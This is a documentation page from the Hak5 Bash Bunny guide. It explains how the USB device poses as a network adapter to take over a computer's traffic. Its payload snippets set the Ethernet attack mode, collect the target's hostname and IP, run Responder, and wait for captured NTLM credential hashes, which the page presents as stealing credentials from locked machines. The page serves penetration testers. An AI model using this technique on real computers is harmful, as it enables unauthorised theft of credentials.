Bash Bunny
Search…
Bash Bunny by Hak5
Getting Started
Switch Positions
Mass Storage Structure
LED Status Indications
Installing Additional Tools
Installing Additional Languages
Considerations for Mark II
Beginner Guides
Writing Keystroke Injection Payloads for the Bash Bunny
Network Hijacking Attacks with the Bash Bunny
Top 5 Bash Bunny Exfiltration Payloads to "steal files"
Getting Root on a Bash Bunny from the Serial Console
Remote Triggers for the Bash Bunny Mark II
Geofencing for the Bash Bunny Mark II
Internet Connectivity
Getting the Bash Bunny Online
Sharing an Internet connection from Windows
Sharing an Internet connection from Linux
Sharing an Internet connection from MacOS
Software Updates
Updating the Bash Bunny Firmware
Writing Payloads
Payload Development Basics
DuckyScript™ on the Bash Bunny
Extensions
ATTACKMODE
LED
QUACK
VID, PID, MAN, PROD, SN
Working with the File System
CPU Control
Contributing Best Practices
Submitting Payloads
WAIT_FOR_PRESENT
Troubleshooting
Factory Reset
Password Reset
Video Guides
Bash Bunny Primer
Bash Bunny Phishing Attack with Hamsters
Password Grabber Bash Bunny Payload
Operating System Detection with the Bash Bunny
Bash Bunny Extensions
Reverse Shells on Linux with Bash Bunny
Bash Bunny Payload - Sudo Bashdoor on Linux
Bash Bunny Payload - 1990's Prank
Bash Bunny Dev - Behind the Scenes
Concealed Exfiltration - Pocket Network Attacks with the Bash Bunny
How to write Bash Bunny payloads and contribute on GitHub
Powered By GitBook
Network Hijacking Attacks with the Bash Bunny
Exploiting local network attack vectors, the Bash Bunny emulates specialized Ethernet adapters. That means the target computer sees the Bash Bunny not as an ordinary flash drive, but as a USB Ethernet Adapter connected to a network. It's a network of two – the Bash Bunny and your target – and once connected, you'll have direct access to the target bypassing any would-be firewalls, countermeasures or intrusion detection systems from the legitimate LAN.
This is done in such a way that allows the Bash Bunny to be recognized on the victim computer as the fastest network, without drivers, automatically – locked or unlocked. As a 2 gigabit adapter with an authoritative DHCP server, the Bash Bunny obtains a low metric. This means that the computer will instantly trust the Bash Bunny with its network traffic — enabling a plethora of automated pocket network attacks undetectable by the existing infrastructure. These bring-your-own-network attacks are cross-platform, with the Bash Bunny exploiting Mac, Linux, and Android computers with its ECM Ethernet attack mode, and Windows computers with its Microsoft proprietary RNDIS Ethernet attack mode. Using these methods, attack like QuickCreds for example are able to steal hashed credentials from locked computers in seconds. Plug the Bash Bunny into a computer, wait a few seconds and when the light is green – the trap is clean!
Let's take a look at how the Bash Bunny pulls off this simple and effective attack.
First we issue the Ethernet attack mode specific for our target. If it's Windows, we'll want to use RNDIS_ETHERNET. If it's a Mac or Linux target, we'll want to use ECM_ETHERNET. Even better - if we're not sure, simply use AUTO_ETHERNET which will try both.
# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET. Try AUTO_ETHERNET for both.
ATTACKMODE RNDIS_ETHERNET
#ATTACKMODE ECM_ETHERNET
#ATTACKMODE AUTO_ETHERNET
# Set variables for the target's computer name and IP address.
GET TARGET_HOSTNAME
GET TARGET_IP
In the above example, we also grab variables for the target's hostname and IP address, which is useful for naming the logs that we lovingly call loot.
# Run Responder with specified options
python Responder.py -I usb0 $RESPONDER_OPTIONS &
# Wait until NTLM log is found
until [ -f logs/*NTLM* ]
do
# Ima just loop here until NTLM logs are found
sleep 1
done
Then we simply run Responder on the usb0 interface - which is the network directly connected to the target using the Ethernet attack mode above. Finally, we wait until the NTLM hashes are captured. Easy!
With a full TCP/IP stack and all common Linux-based tools at your disposal, the possibilities for pocket network attacks are endless!
Beginner Guides - Previous
Writing Keystroke Injection Payloads for the Bash Bunny
Next - Beginner Guides
Top 5 Bash Bunny Exfiltration Payloads to "steal files"
Last modified 8mo ago
Copy link